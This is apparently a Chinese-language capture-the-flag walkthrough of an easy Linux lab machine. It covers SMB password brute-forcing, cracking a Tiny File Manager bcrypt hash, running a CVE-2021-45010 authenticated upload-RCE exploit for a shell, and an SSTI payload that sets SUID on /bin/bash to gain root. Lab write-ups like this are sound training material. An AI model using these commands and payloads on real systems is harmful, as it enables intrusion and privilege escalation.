Box Info #
| OS | Difficulty |
|---|---|
| Linux | Easy |
Nmap #
[root@kali] /home/kali/manage
❯ nmap 192.168.55.66 -sV -A -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
MAC Address: 08:00:27:01:D6:2B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Dirsearch #
[root@kali] /home/kali/manage
❯ dirsearch -u 'http://192.168.55.66' ⏎
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.66/
[23:33:52] Scanning:
[23:33:53] 403 - 278B - /.php
[23:33:55] 200 - 11KB - /admin.php
[23:34:01] 200 - 10KB - /index.html
[23:34:05] 403 - 278B - /server-status/
[23:34:05] 403 - 278B - /server-status
Task Completed
好像不存在SQL注入问题,也无法爆破登录,现在来看看445端口
SMB #
先用enum4linux收集一下信息
[root@kali] /home/kali/manage
❯ enum4linux -a 192.168.55.66
<skip>
=================================( Share Enumeration on 192.168.55.66 )=================================
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
backup Disk
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.55.66 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
<skip>
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\support (Local User)
S-1-22-1-1001 Unix User\username (Local User)
S-1-22-1-1002 Unix User\noa (Local User)
[+] Enumerating users using SID S-1-5-21-2534225814-1784283865-2079386028 and logon username '', password ''
S-1-5-21-2534225814-1784283865-2079386028-501 DEBIAN\nobody (Local User)
S-1-5-21-2534225814-1784283865-2079386028-513 DEBIAN\None (Domain Group)
S-1-5-21-2534225814-1784283865-2079386028-1000 DEBIAN\noa (Local User)
<skip>
可以看到有一个noa用户,下面进行爆破密码
[root@kali] /home/kali/manage
❯ crackmapexec smb 192.168.55.66 -u noa -p /usr/share/wordlists/rockyou.txt
<skip>
SMB 192.168.55.66 445 DEBIAN [-] DEBIAN\noa:rachel STATUS_LOGON_FAILURE
SMB 192.168.55.66 445 DEBIAN [-] DEBIAN\noa:tequiero STATUS_LOGON_FAILURE
SMB 192.168.55.66 445 DEBIAN [-] DEBIAN\noa:7777777 STATUS_LOGON_FAILURE
SMB 192.168.55.66 445 DEBIAN [-] DEBIAN\noa:cheese STATUS_LOGON_FAILURE
SMB 192.168.55.66 445 DEBIAN [+] DEBIAN\noa:159753
使用smbmap查看一下权限
[root@kali] /home/kali/manage
❯ smbmap -H 192.168.55.66 -u 'noa' -p '159753'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.55.66:445 Name: 192.168.55.66 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
backup READ ONLY
IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)
noa READ ONLY Home Directories
[*] Closed 1 connections
将admin.php下载下来
[root@kali] /home/kali/manage
❯ smbclient //192.168.55.66/backup -U noa ⏎
Password for [WORKGROUP\noa]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri May 30 10:20:32 2025
.. D 0 Fri May 30 08:28:10 2025
index.html N 10701 Fri May 30 08:28:11 2025
admin.php N 180701 Fri May 30 10:12:34 2025
8200864 blocks of size 1024. 1793856 blocks available
smb: \> get admin.php
getting file \admin.php of size 180701 as admin.php (58820.0 KiloBytes/sec) (average 58821.9 KiloBytes/sec)
Crack Pass #
查看到用户名和密码hash
// Login user name and password
// Users: array('Username' => 'Password', 'Username2' => 'Password2', ...)
// Generate secure password hash - https://tinyfilemanager.github.io/docs/pwd.html
$auth_users = array(
'eli' => '$2y$10$XIOjPqtS5yDbDqeUUPFJfe0u8kU4jN5Ltq/tfcrYKh.fjJ5uE25YC',
);
爆破密码
[root@kali] /home/kali/manage
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
poohbear (?)
1g 0:00:00:00 DONE (2025-05-31 02:59) 2.083g/s 300.0p/s 300.0c/s 300.0C/s shadow..sandra
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
CVE-2021-45010 #
根据版本号2.4.3找到一个可以利用的
[root@kali] /home/kali/manage/tinyfilemanager-2.4.3-exploit (main)
❯ python tiny_file_manager_exploit.py http://192.168.55.66/admin.php eli poohbear
CVE-2021-45010: Tiny File Manager <= 2.4.3 Authenticated RCE Exploit.
Vulnerability discovered by Febin
Exploit Author: FEBIN
[+] Leak in the webroot direcory path to upload shell.
[+] WEBROOT found: /var/www/html
[+] Trying to upload pwn_1417832321089569280.php to /var/www/html directory...
{"status":"success","info":"file upload successful"}
[+] Got Success response. Files seems to be uploaded successfully.
[+] Try to access the shell at http://192.168.55.66/pwn_1417832321089569280.php
[-] File not uploaded...
Exited.
反弹shell,之后在/opt目录下拿到noa的密码
www-data@debian:/opt$ ls -al
total 20
drwxr-xr-x 3 root root 4096 May 30 13:28 .
drwxr-xr-x 19 root root 4096 Mar 4 15:59 ..
drwxr-xr-x 8 root root 4096 Mar 4 16:06 VBoxGuestAdditions-7.0.20
-rw------- 1 root root 2611 May 30 13:28 chatbot.py
-rw-r--r-- 1 www-data www-data 17 May 30 11:08 password.txt
www-data@debian:/opt$ cat password.txt
noa:0ovYDGR0.e17
www-data@debian:/opt$
Root #
查看sudo
noa@debian:/opt$ sudo -l
Matching Defaults entries for noa on debian:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User noa may run the following commands on debian:
(root) NOPASSWD: /usr/bin/python3 /opt/chatbot.py
查看不到源码,直接运行吧,把内网端口用socat转发一下
noa@debian:/tmp$ sudo /usr/bin/python3 /opt/chatbot.py && ./socat TCP-LISTEN:5000,fork TCP:127.0.0.1:5000
* Serving Flask app 'chatbot'
* Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:5000
* Running on http://127.0.0.1:5000
Press CTRL+C to quit
* Restarting with stat
* Debugger is active!
* Debugger PIN: 584-498-758
192.168.55.4 - - [31/May/2025 03:10:35] "GET / HTTP/1.1" 200 -
192.168.55.4 - - [31/May/2025 03:10:35] "GET /favicon.ico HTTP/1.1" 404 -
很明显的SSTI模板注入了
{{lipsum.__globals__.__getitem__('os').popen('chmod +s /bin/bash').read()}}
Summary #
User: SMB用户密码爆破,拿到admin.php源码中的密码进行破解,最后在/opt目录下拿到noa的密码
Root: 内网端口运行的python服务,转发端口到外面,用SSTI进行命令执行,无过滤